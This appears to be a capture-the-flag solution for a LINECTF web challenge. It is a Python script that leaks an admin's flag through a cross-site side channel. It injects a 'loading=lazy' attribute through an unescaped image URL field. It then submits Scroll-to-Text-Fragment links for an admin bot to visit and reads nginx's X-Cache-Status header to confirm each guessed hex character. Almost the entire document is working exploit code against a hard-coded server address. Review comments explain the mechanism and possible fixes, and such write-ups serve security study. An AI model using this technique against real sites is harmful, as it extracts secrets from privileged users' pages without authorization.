Using Scroll-to-Text-Fragment (STTF) and the cache-status header returned by nginx, we can leak the admin's flag.
#!/usr/bin/env python3
import requests
import random
import time
# Base URL of the challenge instance; every request in this script is built
# from it.
target = 'http://35.187.204.223'

# Placeholder file passed as the 'img_file' form field; its contents do not
# matter ("a has nothing interesting"). The handle is never closed in the
# visible script.
rfile = open('./a')
def uploadImage(payload):
    """Create an image post and return the path of the page it produced.

    The post's 'img_url' points at a fixed static image with ``?a=<payload>``
    appended as a cache-busting query string, followed by a space and
    ``loading=lazy``.

    NOTE(review): the trailing `` loading=lazy`` only has an effect if the
    server writes img_url into the <img> tag without quoting/escaping it, so
    the text after the space becomes a separate attribute -- inferred from
    this script, not verified. Quoting and escaping the attribute value
    server-side would close that off.

    Args:
        payload: Unique token placed in the image URL's query string.

    Returns:
        The href of the new post as found in the response HTML, or None
        (implicitly) when no line of the response contains the title.
    """
    # Long, random title: it doubles as a unique marker for locating this
    # post's link in the returned HTML.
    marker = 'A'*10000+str(random.random())+' IMHERE '
    form = {
        'title': marker,
        'img_url': f'/static/image/68fa5809a96e4870989609a6676826ba.jpg?a={payload} loading=lazy',
        'img_file': rfile,
    }
    body = s.post(f'{target}/image', data=form).text

    for line in body.split("\n"):
        if marker not in line:
            continue
        # '<a href="' is 9 characters, so +10 also skips the first character
        # of the href (presumably a leading '/'); -2 drops the two characters
        # just before the title (presumably '">').
        start = line.index('<a href="') + 10
        end = line.index(marker) - 2
        return line[start:end]
# NOTE(review): the original paste had no indentation; the structure below is
# reconstructed, reading the trailing `else` as belonging to the `if`.

# Log in once; the session is reused for every authenticated request below
# and inside uploadImage.
s = requests.session()
s.post(
    f'{target}/login',
    data={'username':'adsfadfadfhsdjf','password':'adsfadfadfhsdjf'},
)
# Example of a page URL created by an upload:
# http://35.187.204.223/image/26233421-c4b1-4b4b-a43b-fe3770c5c071

# Part of the flag already known; characters are separated by '/'.
flag = 'LINECTF{0/5/d/'

# Recover the flag one hex character at a time. Each round:
#   1. creates a post whose image URL carries a fresh random key, so the
#      cache has never seen that URL before;
#   2. submits the post's path plus a '#:~:text=' fragment (known prefix +
#      candidate character) to /share;
#   3. waits, then requests the same image URL and reads X-Cache-Status.
# A 'HIT' means the image was already fetched by someone else in the
# meantime, which the script takes as confirmation of the candidate.
#
# NOTE(review): the signal here is the X-Cache-Status response header being
# readable by any client. Not exposing cache status externally, and
# preventing the attribute injection in img_url, would remove it -- inferred
# from this script, not verified against the server.
while True:
    for guess in "0123456789abcdef":
        key = str(random.random())[-8:]
        page_path = uploadImage('lmao'+key)
        share_path = page_path+'#:~:text='+flag+guess
        reply = s.post(f'{target}/share',json={'path':share_path}).json()
        assert reply['result'] == 'ok'

        # Give the shared page time to be visited before probing the cache.
        time.sleep(5)

        # The probe deliberately uses a plain request, not the session.
        probe = requests.get(f'{target}/static/image/68fa5809a96e4870989609a6676826ba.jpg?a=lmao{key}')
        if probe.headers['X-Cache-Status'] != 'HIT':
            print(guess)
            continue

        flag += guess+'/'
        print(flag)
        break